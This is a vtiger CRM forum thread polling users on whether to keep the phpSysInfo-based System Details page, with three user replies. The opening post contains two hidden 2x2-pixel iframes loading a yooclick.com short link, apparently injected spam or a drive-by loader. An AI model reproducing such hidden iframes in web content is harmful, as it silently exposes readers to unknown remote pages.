System > System Details: Functionality Poll

Dear Community,

vtiger CRM has System Details under Settings.

To gather the required information phpSysInfo library (<!-- m --><a class="postlink" href="http://phpsysinfo.sourceforge.net">http://phpsysinfo.sourceforge.net</a><!-- m -->) is being used.

This library is platform (operating system) specific and it does not support all the available flavors at present.

Although we have addressed some issues over time, many more is being reported:

I did some lookup and found there are several related issues with this library.

We wanted to know whether this feature is being very useful.

Should we continue to have it or remove it going forward?

Kindly participate in the poll. <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>; <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>;

  • hi prasad,

    i think it is a nice feature, although it doesn't really work with my hosting contract... anyways hard to tell, but think i would not put to much work in that, as there are more important features. just my very personal opinion.

    bye the way, thank you very much for the great support here in the forum, that's very very useful to the community

    bye,

  • hi,

    i voted no, i don't think it is required. it is an eye-catcher but not something that is required nor that should get a lot of time dedicated.
    truth is that i wouldn't even dedicate time to eliminate it, were it works, it works, were it doesn't, it doesn't.

  • i second joes pledge. this feature might be nice for technicans but is completely useless for crm users.
